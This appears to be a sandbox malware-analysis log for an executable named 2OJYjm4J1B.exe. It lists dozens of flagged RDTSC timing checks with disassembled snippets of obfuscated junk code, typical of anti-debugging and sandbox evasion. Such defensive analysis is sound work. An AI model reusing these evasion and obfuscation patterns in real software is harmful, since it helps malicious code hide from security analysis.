Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16E8C second address: B16EE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B929h 0x00000007 pushad 0x00000008 jp 00007FA6CD35B916h 0x0000000e jmp 00007FA6CD35B91Ah 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007FA6CD35B91Dh 0x00000024 ja 00007FA6CD35B916h 0x0000002a popad 0x0000002b jp 00007FA6CD35B91Eh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B16FF1 second address: B16FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B0C995 second address: B0C9C3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA6CD35B916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007FA6CD35B91Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA6CD35B91Fh 0x00000017 jns 00007FA6CD35B916h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B0C9C3 second address: B0C9C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE66E7 second address: AE66F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA6CD35B916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE66F4 second address: AE66F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE66F9 second address: AE6700 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B178E3 second address: B178ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA6CC859EC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B178ED second address: B1790A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007FA6CD35B916h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA6CD35B91Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B17A62 second address: B17A84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECEh 0x00000007 jmp 00007FA6CC859ECDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B17A84 second address: B17A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B17A8A second address: B17A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B17A92 second address: B17A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA6CD35B916h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B17A9E second address: B17AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CC859ED9h 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B17C3A second address: B17C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B17C3F second address: B17C51 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA6CC859ECCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B17C51 second address: B17C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B17C57 second address: B17C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B1ADC3 second address: B1ADD9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FA6CD35B91Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE9DBA second address: AE9DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE9DC0 second address: AE9DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE9DC8 second address: AE9DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AE9DD2 second address: AE9DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B1CA01 second address: B1CA1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CC859ED6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B1CA1B second address: B1CA38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B1CA38 second address: B1CA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B1DB03 second address: B1DB09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2334F second address: B23374 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA6CC859ED6h 0x0000000b pushad 0x0000000c je 00007FA6CC859ECCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: AEEE88 second address: AEEE9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B91Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2275C second address: B2276A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA6CC859EC6h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2291A second address: B22920 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B22920 second address: B22934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FA6CC859EC6h 0x0000000e jns 00007FA6CC859EC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B22934 second address: B2294D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B925h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2294D second address: B22980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007FA6CC859EC6h 0x00000009 jno 00007FA6CC859EC6h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA6CC859ED7h 0x0000001b jne 00007FA6CC859EC6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B22980 second address: B22986 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B22986 second address: B2298D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B22AAF second address: B22ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA6CD35B916h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B22ABC second address: B22ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6CC859ECBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B22ACE second address: B22B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B91Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA6CD35B920h 0x00000012 push ecx 0x00000013 jmp 00007FA6CD35B920h 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B22F2C second address: B22F42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FA6CC859EC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edi 0x0000000e jl 00007FA6CC859EDFh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B231FE second address: B23208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FA6CD35B916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B25F61 second address: B25F65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B25F65 second address: B25F6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B25F6D second address: B25F89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6CC859ECBh 0x00000008 jmp 00007FA6CC859ECCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B27E1B second address: B27E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B28AEA second address: B28AEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B28AEE second address: B28AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FA6CD35B918h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B28AFF second address: B28B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007FA6CC859EC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FA6CC859EC8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push eax 0x0000002a push ecx 0x0000002b pushad 0x0000002c jc 00007FA6CC859EC6h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B28C10 second address: B28C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B925h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B28E48 second address: B28E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B28E4C second address: B28E5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA6CD35B916h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B28E5A second address: B28E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jng 00007FA6CC859ED4h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2920D second address: B29212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A0F6 second address: B2A118 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6CC859ED0h 0x00000008 jmp 00007FA6CC859ECAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA6CC859ECBh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A118 second address: B2A122 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA6CD35B91Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A122 second address: B2A1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FA6CC859EC8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 xor di, C970h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007FA6CC859EC8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push eax 0x00000047 call 00007FA6CC859EC8h 0x0000004c pop eax 0x0000004d mov dword ptr [esp+04h], eax 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc eax 0x0000005a push eax 0x0000005b ret 0x0000005c pop eax 0x0000005d ret 0x0000005e xchg eax, ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jnp 00007FA6CC859EC6h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A1A5 second address: B2A1AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A1AB second address: B2A1B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A1B1 second address: B2A1B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A1B5 second address: B2A1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A1C3 second address: B2A1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2BD1E second address: B2BD43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007FA6CC859ED0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2BD43 second address: B2BDA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FA6CD35B918h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 or di, C54Dh 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007FA6CD35B918h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 push 00000000h 0x00000044 sub di, 68FFh 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2BDA6 second address: B2BDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2DF02 second address: B2DF08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2DF08 second address: B2DF23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CC859ED7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2DC54 second address: B2DC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FA6CD35B926h 0x0000000f jmp 00007FA6CD35B920h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2DC73 second address: B2DC78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2E97B second address: B2E9E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007FA6CD35B918h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 push 00000000h 0x00000024 jmp 00007FA6CD35B923h 0x00000029 push 00000000h 0x0000002b mov edi, ecx 0x0000002d xchg eax, ebx 0x0000002e pushad 0x0000002f jc 00007FA6CD35B918h 0x00000035 pushad 0x00000036 popad 0x00000037 jmp 00007FA6CD35B91Dh 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f je 00007FA6CD35B918h 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2FE11 second address: B2FE15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B319FB second address: B319FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B319FF second address: B31A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B31A05 second address: B31A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B91Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B31A13 second address: B31A5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jbe 00007FA6CC859ECCh 0x0000000f mov ebx, dword ptr [ebp+122D3904h] 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D3878h] 0x0000001d push 00000000h 0x0000001f or dword ptr [ebp+122D185Fh], ecx 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 je 00007FA6CC859EDFh 0x0000002e jmp 00007FA6CC859ED9h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B32964 second address: B3296E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA6CD35B916h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B33867 second address: B3386C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B32B0D second address: B32B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B34731 second address: B34736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B34857 second address: B3485B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B348FD second address: B34902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B35954 second address: B3595C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B3595C second address: B35960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B389AE second address: B389B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B37B87 second address: B37B9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jns 00007FA6CC859EC6h 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
